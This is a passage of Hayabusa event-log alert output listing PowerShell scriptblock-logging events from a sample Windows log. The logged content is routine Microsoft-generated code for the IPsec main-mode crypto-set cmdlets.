[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPrese",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service 
SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.611 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"t { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPrese",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.611 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"nt} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = 
[Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeCryptoSet' -Alias '*' function Remove-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters 
$__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) 
$__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if 
